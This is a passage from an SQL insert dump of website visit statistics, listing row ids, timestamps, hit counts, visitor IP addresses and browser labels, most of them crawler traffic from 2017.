'51.255.65.57','other'),(127976,1498866048,1,1,0,0,'164.132.162.159','other'),(127977,1498866070,1,0,1,0,'68.180.230.48',''),(127978,1498866137,1,1,0,0,'37.204.66.49','msie'),(127979,1498866241,1,1,0,0,'51.255.71.100','other'),(127980,1498866554,1,1,0,0,'95.108.179.15','other'),(127981,1498866749,1,1,0,0,'141.8.142.38','other'),(127982,1498866973,1,1,0,0,'95.108.213.7','other'),(127983,1498867039,1,1,0,0,'164.132.161.31','other'),(127984,1498867332,1,1,0,0,'178.154.149.3','other'),(127985,1498867412,1,1,0,0,'46.188.106.212','msie'),(127986,1498867423,1,1,0,0,'217.182.132.182','other'),(127987,1498867501,2,2,0,0,'95.108.179.15','other'),(127988,1498867516,1,1,0,0,'95.220.193.109','msie'),(127989,1498867602,1,1,0,0,'95.108.213.34','other'),(127990,1498867644,1,1,0,0,'37.204.152.178','msie'),(127991,1498867664,1,1,0,0,'164.132.161.74','other'),(127992,1498867705,1,1,0,0,'141.8.142.97','other'),(127993,1498867921,1,1,0,0,'51.255.65.60','other'),(127994,1498868187,1,1,0,0,'217.182.132.65','other'),(127995,1498868336,1,1,0,0,'51.255.65.2','other'),(127996,1498868543,1,1,0,0,'141.8.142.154','other'),(127997,1498868766,1,1,0,0,'87.250.224.8','other'),(127998,1498868788,1,1,0,0,'178.154.200.2','other'),(127999,1498869053,2,2,0,0,'141.8.142.97','other'),(128000,1498869359,1,1,0,0,'51.255.65.45','other'),(128001,1498869387,1,1,0,0,'95.108.179.15','other'),(128002,1498869606,1,1,0,0,'141.8.142.154','other'),(128003,1498869804,2,2,0,0,'5.255.253.63','other'),(128004,1498870023,1,1,0,0,'95.108.213.34','other'),(128005,1498870051,1,1,0,0,'141.8.142.164','other'),(128006,1498870142,1,1,0,0,'66.249.66.75','chrome'),(128007,1498870158,1,1,0,0,'66.249.76.108','chrome'),(128008,1498870167,2,2,0,0,'5.255.253.58','other'),(128009,1498870267,1,1,0,0,'141.8.132.39','other'),(128010,1498870319,1,1,0,0,'178.255.215.94','other'),(128011,1498870674,1,1,0,0,'66.249.76.107','chrome'),(128012,1498870690,1,1,0,0,'141.8.142.38','other'),(128013,1498870847,1,1,0,0,'87.250.224.18','other'),(128014,1498870859,1,1,0,0,'8.29.198.25','other'),(128015,1498871075,2,2,0,0,'95.108.213.7','other'),(128016,1498871093,1,1,0,0,'164.132.161.15','other'),(128017,1498871209,2,2,0,0,'95.108.179.15','other'),(128018,1498871360,1,1,0,0,'51.255.71.120','other'),(128019,1498871399,1,1,0,0,'217.182.132.60','other'),(128020,1498871485,1,1,0,0,'217.182.132.77','other'),(128021,1498871533,1,1,0,0,'217.182.132.97','other'),(128022,1498871552,1,1,0,0,'5.255.253.58','other'),(128023,1498871680,1,1,0,0,'141.8.142.154','other'),(128024,1498871757,2,2,0,0,'5.255.253.63','other'),(128025,1498872051,1,1,0,0,'51.255.65.68','other'),(128026,1498872053,1,1,0,0,'87.250.224.18','other'),(128027,1498872132,1,1,0,0,'51.255.65.23','other'),(128028,1498872259,1,1,0,0,'95.108.213.34','other'),(128029,1498872389,1,1,0,0,'51.255.65.52','other'),(128030,1498872631,1,1,0,0,'217.182.132.63','other'),(128031,1498872739,1,1,0,0,'217.182.132.156','other'),(128032,1498873843,1,1,0,0,'188.32.176.228','msie'),(128033,1498873912,1,1,0,0,'217.182.132.240','other'),(128034,1498874408,1,1,0,0,'51.255.65.82','other'),(128035,1498874421,1,0,1,0,'66.249.76.108',''),(128036,1498874454,1,1,0,0,'51.255.65.52','other'),(128037,1498874597,1,1,0,0,'164.132.161.5','other'),(128038,1498874726,1,1,0,0,'164.132.161.75','other'),(128039,1498874971,1,1,0,0,'37.204.66.49','msie'),(128040,1498875208,1,1,0,0,'164.132.161.85','other'),(128041,1498875440,1,1,0,0,'164.132.161.61','other'),(128042,1498875497,1,1,0,0,'141.8.142.97','other'),(128043,1498875866,1,0,1,0,'68.180.230.48',''),(128044,1498876305,1,1,0,0,'51.255.65.81','other'),(128045,1498876622,1,1,0,0,'37.147.102.18','msie'),(128046,1498876645,1,1,0,0,'217.182.132.18','other'),(128047,1498876853,1,1,0,0,'188.255.23.130','msie'),(128048,1498877027,1,1,0,0,'151.80.27.118','other'),(128049,1498877386,2,2,0,0,'95.108.179.15','other'),(128050,1498878069,1,1,0,0,'87.250.224.8','other'),(128051,1498878114,1,1,0,0,'87.250.224.18','other'),(128052,1498878167,1,1,0,0,'217.182.132.57','other'),(128053,1498878362,1,1,0,0,'93.158.152.77','other'),(128054,1498878484,1,1,0,0,'141.8.142.91','other'),(128055,1498878488,1,1,0,0,'178.154.200.2','other'),(128056,1498878545,2,2,0,0,'93.158.152.79','other'),(128057,1498878771,2,2,0,0,'141.8.142.28','other'),(128058,1498879006,1,1,0,0,'5.255.253.81','other'),(128059,1498879259,1,1,0,0,'164.132.161.9','other'),(128060,1498879825,1,1,0,0,'46.188.106.212','msie'),(128061,1498879898,1,1,0,0,'51.255.65.94','other'),(128062,1498880064,1,1,0,0,'51.255.65.87','other'),(128063,1498880253,1,1,0,0,'40.77.167.33','other'),(128064,1498880315,1,1,0,0,'164.132.161.22','other'),(128065,1498880473,1,1,0,0,'51.255.71.133','other'),(128066,1498880774,1,1,0,0,'180.76.15.143','other'),(128067,1498881685,1,1,0,0,'8.29.198.26','other'),(128068,1498882247,1,0,1,0,'66.249.76.89',''),(128069,1498882256,1,1,0,0,'66.249.76.89','chrome'),(128070,1498882369,1,1,0,0,'66.249.76.93','chrome'),(128071,1498882374,1,1,0,0,'217.69.133.6','other'),(128072,1498882513,1,1,0,0,'51.255.65.47','other'),(128073,1498882648,1,1,0,0,'164.132.161.91','other'),(128074,1498883047,1,1,0,0,'141.8.142.42','other'),(128075,1498883051,1,1,0,0,'141.8.142.154','other'),(128076,1498883193,1,1,0,0,'91.209.11.236','other'),(128077,1498883433,1,1,0,0,'141.8.142.164','other'),(128078,1498883551,1,1,0,0,'95.108.179.15','other'),(128079,1498884144,1,1,0,0,'91.209.11.236','other'),(128080,1498884496,1,1,0,0,'217.182.132.186','other'),(128081,1498884554,1,1,0,0,'51.255.65.40','other'),(128082,1498884569,1,1,0,0,'51.255.71.114','other'),(128083,1498884722,1,1,0,0,'164.132.161.53','other'),(128084,1498885209,1,1,0,0,'66.249.66.155','chrome'),(128085,1498885346,1,1,0,0,'217.182.132.28','other'),(128086,1498885377,1,1,0,0,'91.209.11.236','other'),(128087,1498885679,1,1,0,0,'40.77.167.94','other'),(128088,1498885815,2,2,0,0,'95.108.213.34','other'),(128089,1498886180,1,1,0,0,'164.132.162.158','other'),(128090,1498886245,1,0,1,0,'66.249.66.155',''),(128091,1498886336,1,1,0,0,'91.209.11.236','other'),(128092,1498886505,1,1,0,0,'164.132.161.22','other'),(128093,1498887415,2,2,0,0,'91.209.11.236','other'),(128094,1498887790,1,1,0,0,'5.255.253.63','other'),(128095,1498887850,1,1,0,0,'217.69.133.6','other'),(128096,1498887859,1,1,0,0,'51.255.65.62','other'),(128097,1498887870,1,1,0,0,'141.8.142.97','other'),(128098,1498888473,1,0,1,0,'66.249.76.109',''),(128099,1498888511,1,1,0,0,'217.182.132.193','other'),(128100,1498888870,1,1,0,0,'91.209.11.236','other'),(128101,1498889138,1,1,0,0,'217.182.132.17','other'),(128102,1498889189,1,1,0,0,'217.182.132.190','other'),(128103,1498889406,1,1,0,0,'51.255.65.90','other'),(128104,1498889609,1,1,0,0,'217.182.132.24','other'),(128105,1498890182,1,1,0,0,'217.182.132.67','other'),(128106,1498890364,2,2,0,0,'91.209.11.236','other'),(128107,1498890536,1,0,1,0,'66.249.76.107',''),(128108,1498890581,1,1,0,0,'51.255.65.17','other'),(128109,1498890841,1,1,0,0,'51.255.71.116','other'),(128110,1498890842,1,1,0,0,'217.182.132.17','other'),(128111,1498890850,1,1,0,0,'164.132.161.33','other'),(128112,1498891295,1,1,0,0,'51.255.65.28','other'),(128113,1498891420,2,2,0,0,'91.209.11.236','other'),(128114,1498891465,1,1,0,0,'164.132.161.55','other'),(128115,1498891521,1,1,0,0,'178.154.200.2','other'),(128116,1498891605,1,1,0,0,'217.182.132.241','other'),(128117,1498891634,1,1,0,0,'217.182.132.80','other'),(128118,1498891897,1,1,0,0,'217.182.132.68','other'),(128119,1498891965,1,1,0,0,'109.173.25.162','msie'),(128120,1498891999,1,1,0,0,'87.250.224.8','other'),(128121,1498892165,1,1,0,0,'51.255.65.69','other'),(128122,1498892214,1,1,0,0,'164.132.161.96','other'),(128123,1498892513,1,1,0,0,'8.29.198.25','other'),(128124,1498893593,1,1,0,0,'66.249.76.107','chrome'),(128125,1498894285,1,1,0,0,'164.132.161.70','other'),(128126,1498894453,1,1,0,0,'66.249.66.157','chrome'),(128127,1498894785,1,1,0,0,'51.255.65.17','other'),(128128,1498894990,1,1,0,0,'51.255.71.100','other'),(128129,1498895057,1,1,0,0,'51.255.65.71','other'),(128130,1498895665,1,1,0,0,'66.249.76.93','chrome'),(128131,1498895745,1,1,0,0,'66.249.66.157','chrome'),(128132,1498895929,1,1,0,0,'66.249.76.89','chrome'),(128133,1498896124,1,1,0,0,'51.255.65.33','other'),(128134,1498896158,1,1,0,0,'217.182.132.52','other'),(128135,1498896253,1,1,0,0,'51.255.65.91','other'),(128136,1498896583,1,0,1,0,'66.249.76.93',''),(128137,1498896774,1,0,1,0,'66.249.66.74',''),(128138,1498896963,1,1,0,0,'217.182.132.90','other'),(128139,1498897015,1,1,0,0,'151.80.27.116','other'),(128140,1498898143,1,0,1,0,'68.180.230.48',''),(128141,1498898277,2,2,0,0,'91.209.11.236','other'),(128142,1498898855,1,1,0,0,'217.182.132.172','other'),(128143,1498899202,1,1,0,0,'51.255.65.11','other'),(128144,1498899412,1,1,0,0,'66.249.76.109','chrome'),(128145,1498899652,1,1,0,0,'40.77.167.33','other'),(128146,1498900103,1,0,1,0,'66.249.76.108',''),(128147,1498900273,2,0,2,0,'66.249.76.107',''),(128148,1498900369,1,1,0,0,'51.255.65.63','other'),(128149,1498900557,1,1,0,0,'51.255.65.91','other'),(128150,1498901011,1,1,0,0,'66.249.76.107','chrome'),(128151,1498901016,1,1,0,0,'51.255.65.65','other'),(128152,1498901724,1,1,0,0,'178.154.149.1','other'),(128153,1498901793,1,1,0,0,'164.132.161.85','other'),(128154,1498901919,1,1,0,0,'217.182.132.21','other'),(128155,1498902026,1,1,0,0,'95.28.55.14','msie'),(128156,1498902334,1,0,1,0,'66.249.76.108',''),(128157,1498902691,1,1,0,0,'217.182.132.4','other'),(128158,1498902876,1,1,0,0,'217.182.132.173','other'),(128159,1498903265,1,1,0,0,'164.132.161.11','other'),(128160,1498903341,1,1,0,0,'8.29.198.25','other'),(128161,1498904236,1,1,0,0,'51.255.65.42','other'),(128162,1498904274,1,1,0,0,'217.182.132.70','other'),(128163,1498904805,1,1,0,0,'51.255.65.87','other'),(128164,1498904897,1,1,0,0,'137.74.207.109','other'),(128165,1498904997,1,1,0,0,'207.46.13.140','other'),(128166,1498905711,1,0,1,0,'66.249.76.89',''),(128167,1498906059,1,1,0,0,'180.76.15.146','other'),(128168,1498906415,1,1,0,0,'51.255.65.42','other'),(128169,1498907600,1,1,0,0,'51.255.65.67','other'),(128170,1498907782,1,1,0,0,'164.132.161.20','other'),(128171,1498907967,1,1,0,0,'164.132.161.32','other'),(128172,1498908145,1,1,0,0,'51.255.65.39','other'),(128173,1498908190,1,1,0,0,'164.132.161.4','other'),(128174,1498908331,1,1,0,0,'51.255.65.81','other'),(128175,1498908409,1,1,0,0,'141.8.142.38','other'),(128176,1498908410,1,1,0,0,'176.31.231.10','other'),(128177,1498908886,1,1,0,0,'164.132.162.188','other'),(128178,1498909172,1,1,0,0,'164.132.161.62','other'),(128179,1498909178,1,0,1,0,'66.249.76.109',''),(128180,1498909729,1,1,0,0,'217.182.132.176','other'),(128181,1498909775,1,1,0,0,'217.182.132.30','other'),(128182,1498909780,1,1,0,0,'51.255.65.8','other'),(128183,1498909832,1,1,0,0,'164.132.161.28','other'),(128184,1498909871,1,1,0,0,'51.255.71.120','other'),(128185,1498910040,1,1,0,0,'164.132.162.187','other'),(128186,1498910240,1,1,0,0,'217.182.132.183','other'),(128187,1498910766,1,1,0,0,'164.132.161.67','other'),(128188,1498910852,1,1,0,0,'141.8.142.164','other'),(128189,1498911121,1,1,0,0,'164.132.161.38','other'),(128190,1498911489,1,1,0,0,'216.218.222.12','chrome'),(128191,1498911579,1,1,0,0,'217.182.132.184','other'),(128192,1498912014,1,1,0,0,'51.255.65.45','other'),(128193,1498912061,1,1,0,0,'66.249.76.89','chrome'),(128194,1498912481,1,1,0,0,'164.132.161.28','other'),(128195,1498912685,1,1,0,0,'164.132.161.36','other'),(128196,1498912922,1,1,0,0,'164.132.161.10','other'),(128197,1498913310,1,1,0,0,'91.209.11.236','other'),(128198,1498913429,1,1,0,0,'188.32.176.228','msie'),(128199,1498914073,1,1,0,0,'66.249.76.108','chrome'),(128200,1498914149,1,1,0,0,'87.250.224.16','other'),(128201,1498914153,1,1,0,0,'141.8.183.1','other'),(128202,1498914173,1,1,0,0,'8.29.198.27','other'),(128203,1498914190,1,1,0,0,'141.8.132.43','other'),(128204,1498914264,1,1,0,0,'137.74.207.170','other'),(128205,1498914298,1,1,0,0,'5.165.254.136','msie'),(128206,1498914468,1,1,0,0,'51.255.65.86','other'),(128207,1498915053,1,1,0,0,'164.132.161.17','other'),(128208,1498915070,1,1,0,0,'95.84.129.5','msie'),(128209,1498915188,1,1,0,0,'91.209.11.236','other'),(128210,1498915245,1,1,0,0,'40.77.167.94','other'),(128211,1498915470,1,1,0,0,'217.182.132.193','other'),(128212,1498915597,1,1,0,0,'51.255.71.115','other'),(128213,1498915668,1,1,0,0,'95.220.193.109','msie'),(128214,1498916258,1,1,0,0,'217.182.132.56','other'),(128215,1498916300,1,1,0,0,'51.255.65.42','other'),(128216,1498916503,1,1,0,0,'217.182.132.15','other'),(128217,1498916716,1,1,0,0,'164.132.161.28','other'),(128218,1498916996,1,1,0,0,'91.209.11.236','other'),(128219,1498917156,2,2,0,0,'216.244.66.246','other'),(128220,1498917634,1,1,0,0,'216.244.66.194','other'),(128221,1498918334,3,3,0,0,'91.209.11.236','other'),(128222,1498918623,1,1,0,0,'51.255.71.110','other'),(128223,1498918753,1,0,1,0,'66.249.66.156',''),(128224,1498918759,1,0,1,0,'66.249.66.74',''),(128225,1498918764,1,1,0,0,'164.132.162.158','other'),(128226,1498919083,1,1,0,0,'217.182.132.64','other'),(128227,1498919198,1,1,0,0,'217.182.132.190','other'),(128228,1498919765,1,1,0,0,'91.209.11.236','other'),(128229,1498919945,1,1,0,0,'5.255.253.63','other'),(128230,1498920057,1,1,0,0,'66.249.76.107','chrome'),(128231,1498920125,1,1,0,0,'164.132.161.64','other'),(128232,1498920339,2,2,0,0,'216.244.66.246','other'),(128233,1498920386,1,1,0,0,'51.255.65.3','other'),(128234,1498920805,2,2,0,0,'91.209.11.236','other'),(128235,1498920842,1,1,0,0,'164.132.161.24','other'),(128236,1498921054,1,1,0,0,'217.182.132.192','other'),(128237,1498921157,1,1,0,0,'207.46.13.140','other'),(128238,1498921440,1,1,0,0,'217.182.132.21','other'),(128239,1498921720,1,1,0,0,'188.32.176.228','msie'),(128240,1498922469,3,3,0,0,'91.209.11.236','other'),(128241,1498922483,1,1,0,0,'176.15.236.70','msie'),(128242,1498923162,1,1,0,0,'51.255.71.116','other'),(128243,1498923366,1,1,0,0,'37.204.152.178','msie'),(128244,1498923412,1,1,0,0,'91.209.11.236','other'),(128245,1498923827,1,0,1,0,'68.180.230.48',''),(128246,1498923968,1,1,0,0,'217.182.132.23','other'),(128247,1498924187,1,1,0,0,'217.182.132.146','other'),(128248,1498924248,1,1,0,0,'51.255.65.3','other'),(128249,1498924301,1,1,0,0,'109.173.118.157','chrome'),(128250,1498924346,1,1,0,0,'51.255.65.50','other'),(128251,1498924527,2,2,0,0,'91.209.11.236','other'),(128252,1498924672,2,2,0,0,'216.244.66.246','other'),(128253,1498924854,1,0,1,0,'66.249.76.107',''),(128254,1498925001,1,1,0,0,'8.29.198.27','other'),(128255,1498925516,1,1,0,0,'51.255.65.55','other'),(128256,1498925649,1,1,0,0,'46.211.20.44','chrome'),(128257,1498925984,1,1,0,0,'66.249.76.109','chrome'),(128258,1498925997,1,1,0,0,'217.182.132.84','other'),(128259,1498926230,1,1,0,0,'51.255.65.47','other'),(128260,1498926453,2,2,0,0,'91.209.11.236','other'),(128261,1498926771,1,1,0,0,'164.132.162.154','other'),(128262,1498927422,1,1,0,0,'217.182.132.184','other'),(128263,1498927556,1,1,0,0,'51.255.65.16','other'),(128264,1498927694,1,1,0,0,'164.132.161.39','other'),(128265,1498927705,1,1,0,0,'92.112.248.33','chrome'),(128266,1498927908,1,1,0,0,'164.132.161.58','other'),(128267,1498928374,1,1,0,0,'51.255.65.45','other'),(128268,1498928391,1,1,0,0,'217.182.132.67','other'),(128269,1498928974,1,1,0,0,'188.32.176.228','msie'),(128270,1498929124,1,1,0,0,'217.182.132.181','other'),(128271,1498929146,1,1,0,0,'51.255.65.59','other'),(128272,1498929161,52,52,0,0,'81.209.177.189','other'),(128273,1498929183,26,26,0,0,'81.209.177.136','other'),(128274,1498929215,1,1,0,0,'37.204.66.49','msie'),(128275,1498929691,1,1,0,0,'217.182.132.60','other'),(128276,1498929755,1,1,0,0,'164.132.161.40','other'),(128277,1498929795,1,1,0,0,'217.182.132.88','other'),(128278,1498929859,1,1,0,0,'217.182.132.82','other'),(128279,1498929870,2,2,0,0,'91.209.11.236','other'),(128280,1498929878,1,1,0,0,'137.74.207.110','other'),(128281,1498930062,55,55,0,0,'81.209.177.189','other'),(128282,1498930088,24,24,0,0,'81.209.177.136','other'),(128283,1498930727,1,1,0,0,'217.182.132.16','other'),(128284,1498930785,1,1,0,0,'178.154.149.3','other'),(128285,1498930833,1,1,0,0,'217.182.132.60','other'),(128286,1498930901,1,1,0,0,'51.255.65.83','other'),(128287,1498930950,1,1,0,0,'137.74.207.102','other'),(128288,1498930963,60,60,0,0,'81.209.177.189','other'),(128289,1498930971,1,1,0,0,'95.220.193.109','msie'),(128290,1498931015,22,22,0,0,'81.209.177.136','other'),(128291,1498931175,1,1,0,0,'46.242.91.219','msie'),(128292,1498931228,1,1,0,0,'51.255.71.121','other'),(128293,1498931859,1,1,0,0,'51.255.65.73','other'),(128294,1498931871,58,58,0,0,'81.209.177.189','other'),(128295,1498931963,22,22,0,0,'81.209.177.136','other'),(128296,1498932524,1,1,0,0,'40.77.167.94','other'),(128297,1498932590,1,0,1,0,'66.249.76.108',''),(128298,1498932731,1,0,1,0,'66.249.66.74',''),(128299,1498932760,1,1,0,0,'164.132.161.17','other'),(128300,1498932786,62,62,0,0,'81.209.177.189','other'),(128301,1498932983,19,19,0,0,'81.209.177.136','other'),(128302,1498932994,1,1,0,0,'51.255.65.7','other'),(128303,1498933007,1,1,0,0,'66.249.76.108','chrome'),(128304,1498933135,2,2,0,0,'217.182.132.51','other'),(128305,1498933441,1,1,0,0,'51.255.65.72','other'),(128306,1498933554,1,1,0,0,'51.255.65.37','other'),(128307,1498933699,59,59,0,0,'81.209.177.189','other'),(128308,1498933779,1,1,0,0,'217.182.132.184','other'),(128309,1498934036,19,19,0,0,'81.209.177.136','other'),(128310,1498934072,1,0,1,0,'66.249.76.109',''),(128311,1498934336,1,1,0,0,'217.182.132.180','other'),(128312,1498934512,2,2,0,0,'216.244.66.246','other'),(128313,1498934594,1,1,0,0,'51.255.65.68','other'),(128314,1498934609,59,59,0,0,'81.209.177.189','other'),(128315,1498934901,1,1,0,0,'217.182.132.157','other'),(128316,1498934979,24,24,0,0,'81.209.177.136','other'),(128317,1498935331,1,1,0,0,'51.255.65.45','other'),(128318,1498935349,1,1,0,0,'51.255.71.118','other'),(128319,1498935529,57,57,0,0,'81.209.177.189','other'),(128320,1498935834,1,1,0,0,'8.29.198.26','other'),(128321,1498935939,23,23,0,0,'81.209.177.136','other'),(128322,1498936014,1,1,0,0,'188.32.176.228','msie'),(128323,1498936099,1,1,0,0,'51.255.65.90','other'),(128324,1498936260,1,0,1,0,'66.249.76.89',''),(128325,1498936441,57,57,0,0,'81.209.177.189','other'),(128326,1498936696,1,1,0,0,'51.255.65.55','other'),(128327,1498936873,31,31,0,0,'81.209.177.136','other'),(128328,1498936887,1,1,0,0,'51.255.65.84','other'),(128329,1498937087,1,1,0,0,'164.132.161.11','other'),(128330,1498937099,1,1,0,0,'5.228.100.210','msie'),(128331,1498937354,59,59,0,0,'81.209.177.189','other'),(128332,1498937468,1,1,0,0,'176.31.231.10','other'),(128333,1498937552,1,1,0,0,'51.255.65.15','other'),(128334,1498937582,2,2,0,0,'207.154.242.231','other'),(128335,1498937595,1,1,0,0,'217.182.132.82','other'),(128336,1498937636,1,1,0,0,'37.204.152.178','msie'),(128337,1498937785,15,15,0,0,'81.209.177.136','other'),(128338,1498937933,1,1,0,0,'5.228.112.217','msie'),(128339,1498938229,1,0,1,0,'66.249.76.109',''),(128340,1498938268,63,63,0,0,'81.209.177.189','other'),(128341,1498938586,1,1,0,0,'164.132.161.48','other'),(128342,1498938682,1,1,0,0,'216.244.66.246','other'),(128343,1498938761,25,25,0,0,'81.209.177.136','other'),(128344,1498938949,1,1,0,0,'5.255.253.63','other'),(128345,1498939185,61,61,0,0,'81.209.177.189','other'),(128346,1498939598,1,1,0,0,'51.255.65.62','other'),(128347,1498939666,22,22,0,0,'81.209.177.136','other'),(128348,1498940045,1,1,0,0,'164.132.161.44','other'),(128349,1498940087,26,26,0,0,'81.209.177.189','other'),(128350,1498940737,1,1,0,0,'51.255.65.51','other'),(128351,1498940965,1,1,0,0,'164.132.161.28','other'),(128352,1498941356,1,1,0,0,'137.74.201.99','other'),(128353,1498941416,1,1,0,0,'164.132.161.53','other'),(128354,1498941601,1,1,0,0,'216.244.66.237','other'),(128355,1498941683,1,1,0,0,'107.167.116.166','chrome'),(128356,1498941752,1,1,0,0,'217.182.132.90','other'),(128357,1498941763,2,2,0,0,'178.92.73.187','chrome'),(128358,1498941764,1,1,0,0,'173.252.84.202','other'),(128359,1498941765,1,1,0,0,'173.252.84.198','other'),(128360,1498941817,1,0,1,0,'66.249.66.157',''),(128361,1498941835,1,1,0,0,'217.182.132.91','other'),(128362,1498941933,1,1,0,0,'66.249.76.109','chrome'),(128363,1498942252,1,1,0,0,'216.244.66.194','other'),(128364,1498942602,1,1,0,0,'217.69.133.5','other'),(128365,1498943402,1,1,0,0,'188.32.176.228','msie'),(128366,1498943403,1,1,0,0,'217.182.132.23','other'),(128367,1498943413,1,1,0,0,'137.74.203.194','other'),(128368,1498943540,1,1,0,0,'217.182.132.91','other'),(128369,1498943711,1,1,0,0,'51.255.65.91','other'),(128370,1498943975,1,1,0,0,'66.249.76.109','chrome'),(128371,1498944019,1,1,0,0,'66.249.76.89','chrome'),(128372,1498944182,2,1,1,0,'66.249.66.155',''),(128373,1498944357,1,1,0,0,'66.249.76.93','chrome'),(128374,1498944381,1,1,0,0,'37.204.66.49','msie'),(128375,1498944392,1,1,0,0,'37.52.21.47','chrome'),(128376,1498944905,3,3,0,0,'216.244.66.246','other'),(128377,1498944939,1,1,0,0,'40.77.167.23','other'),(128378,1498945238,1,1,0,0,'217.182.132.91','other'),(128379,1498945303,1,1,0,0,'164.132.161.22','other'),(128380,1498945323,1,1,0,0,'46.242.91.219','msie'),(128381,1498945475,1,1,0,0,'176.14.37.74','msie'),(128382,1498945558,1,1,0,0,'164.132.161.70','other'),(128383,1498946020,1,0,1,0,'66.249.76.108',''),(128384,1498946140,1,1,0,0,'217.182.132.91','other'),(128385,1498946320,1,1,0,0,'164.132.161.65','other'),(128386,1498946478,1,1,0,0,'164.132.161.79','other'),(128387,1498946639,1,1,0,0,'95.108.179.15','other'),(128388,1498946643,1,1,0,0,'141.8.142.154','other'),(128389,1498946645,1,1,0,0,'164.132.162.159','other'),(128390,1498946663,1,1,0,0,'8.29.198.27','other'),(128391,1498946807,1,1,0,0,'164.132.161.70','other'),(128392,1498946828,1,1,0,0,'217.182.132.67','other'),(128393,1498947333,1,1,0,0,'217.69.133.5','other'),(128394,1498947389,1,1,0,0,'137.74.207.102','other'),(128395,1498947514,1,1,0,0,'164.132.162.156','other'),(128396,1498947659,2,2,0,0,'216.244.66.194','other'),(128397,1498948019,1,1,0,0,'51.255.65.27','other'),(128398,1498948281,1,1,0,0,'51.255.65.62','other'),(128399,1498948362,1,1,0,0,'217.182.132.155','other'),(128400,1498948387,1,1,0,0,'51.255.71.120','other'),(128401,1498948542,1,0,1,0,'66.249.76.107',''),(128402,1498948560,1,1,0,0,'51.255.65.10','other'),(128403,1498949163,1,1,0,0,'51.255.65.84','other'),(128404,1498949172,1,1,0,0,'164.132.161.17','other'),(128405,1498949595,1,1,0,0,'217.182.132.75','other'),(128406,1498949626,2,2,0,0,'216.244.66.246','other'),(128407,1498949637,1,1,0,0,'217.182.132.240','other'),(128408,1498950069,1,1,0,0,'164.132.161.92','other'),(128409,1498950528,1,1,0,0,'137.74.207.161','other'),(128410,1498950535,1,1,0,0,'207.46.13.140','other'),(128411,1498950668,1,1,0,0,'94.180.155.181','msie'),(128412,1498950893,1,1,0,0,'164.132.161.97','other'),(128413,1498951150,1,1,0,0,'5.164.91.16','msie'),(128414,1498951188,1,1,0,0,'51.255.65.6','other'),(128415,1498951804,1,1,0,0,'207.46.13.140','other'),(128416,1498951816,1,1,0,0,'217.182.132.30','other'),(128417,1498952061,1,1,0,0,'66.249.76.109','chrome'),(128418,1498952320,1,1,0,0,'51.255.64.106','other'),(128419,1498952331,1,1,0,0,'5.228.35.210','msie'),(128420,1498952402,1,1,0,0,'95.220.193.109','msie'),(128421,1498952792,1,1,0,0,'216.244.66.237','other'),(128422,1498952801,1,1,0,0,'207.46.13.140','other'),(128423,1498952805,1,0,1,0,'66.249.76.89',''),(128424,1498952809,1,1,0,0,'164.132.161.19','other'),(128425,1498952814,1,1,0,0,'66.249.66.74','chrome'),(128426,1498953066,1,1,0,0,'51.255.65.50','other'),(128427,1498953278,1,1,0,0,'51.255.65.60','other'),(128428,1498953574,1,1,0,0,'180.76.15.24','other'),(128429,1498953589,1,1,0,0,'217.182.132.80','other'),(128430,1498953809,1,1,0,0,'180.76.15.30','other'),(128431,1498954149,1,1,0,0,'164.132.161.50','other'),(128432,1498954208,1,0,1,0,'66.249.66.157',''),(128433,1498954280,1,1,0,0,'51.255.71.115','other'),(128434,1498954287,1,1,0,0,'51.255.71.125','other'),(128435,1498954607,1,1,0,0,'164.132.161.26','other'),(128436,1498954701,1,1,0,0,'95.108.179.15','other'),(128437,1498954795,3,3,0,0,'216.244.66.246','other'),(128438,1498954919,1,1,0,0,'51.255.65.48','other'),(128439,1498955180,1,1,0,0,'51.255.65.68','other'),(128440,1498955266,1,1,0,0,'217.182.132.78','other'),(128441,1498955282,1,1,0,0,'51.255.65.51','other'),(128442,1498955739,1,1,0,0,'51.255.65.19','other'),(128443,1498956907,1,1,0,0,'164.132.161.44','other'),(128444,1498957496,1,1,0,0,'8.29.198.27','other'),(128445,1498957849,1,1,0,0,'188.32.185.75','msie'),(128446,1498957933,1,1,0,0,'217.182.132.34','other'),(128447,1498957982,5,5,0,0,'149.140.65.17','other'),(128448,1498958532,1,1,0,0,'37.204.66.49','msie'),(128449,1498958796,1,1,0,0,'216.244.66.237','other'),(128450,1498959024,1,1,0,0,'95.220.39.79','msie'),(128451,1498959221,1,1,0,0,'217.182.132.88','other'),(128452,1498959267,1,0,1,0,'66.249.76.107',''),(128453,1498959531,1,1,0,0,'37.204.152.178','msie'),(128454,1498959544,1,1,0,0,'164.132.161.64','other'),(128455,1498959594,1,1,0,0,'95.220.193.109','msie'),(128456,1498960301,1,1,0,0,'51.255.65.13','other'),(128457,1498960546,1,1,0,0,'217.182.132.152','other'),(128458,1498960831,1,1,0,0,'164.132.162.153','other'),(128459,1498961108,1,1,0,0,'216.244.66.246','other'),(128460,1498961472,1,1,0,0,'51.255.65.80','other'),(128461,1498961868,1,1,0,0,'164.132.161.42','other'),(128462,1498961885,1,1,0,0,'176.31.231.10','other'),(128463,1498962027,4,4,0,0,'216.244.66.194','other'),(128464,1498962376,1,1,0,0,'51.255.65.29','other'),(128465,1498963449,1,1,0,0,'164.132.161.33','other'),(128466,1498963506,1,1,0,0,'51.255.65.15','other'),(128467,1498964394,1,1,0,0,'217.182.132.71','other'),(128468,1498964787,1,1,0,0,'216.244.66.246','other'),(128469,1498964846,1,1,0,0,'164.132.161.53','other'),(128470,1498964862,1,1,0,0,'51.255.65.33','other'),(128471,1498964969,1,1,0,0,'188.32.176.228','msie'),(128472,1498965199,1,1,0,0,'164.132.161.76','other'),(128473,1498965536,1,1,0,0,'37.204.66.49','msie'),(128474,1498966220,1,1,0,0,'51.255.71.116','other'),(128475,1498966284,1,1,0,0,'164.132.161.56','other'),(128476,1498966410,1,1,0,0,'66.249.76.93','chrome'),(128477,1498966457,1,1,0,0,'66.249.76.109','chrome'),(128478,1498966523,1,1,0,0,'37.204.152.178','msie'),(128479,1498966536,1,0,1,0,'66.249.76.108',''),(128480,1498966759,1,1,0,0,'95.220.193.109','msie'),(128481,1498967088,3,3,0,0,'216.244.66.194','other'),(128482,1498967771,1,1,0,0,'164.132.161.5','other'),(128483,1498967869,1,0,1,0,'68.180.230.48',''),(128484,1498968327,1,1,0,0,'8.29.198.27','other'),(128485,1498968779,1,1,0,0,'40.77.167.94','other'),(128486,1498969107,1,1,0,0,'51.255.65.41','other'),(128487,1498969836,1,1,0,0,'217.182.132.171','other'),(128488,1498970024,1,1,0,0,'51.255.65.41','other'),(128489,1498970211,1,1,0,0,'217.182.132.76','other'),(128490,149897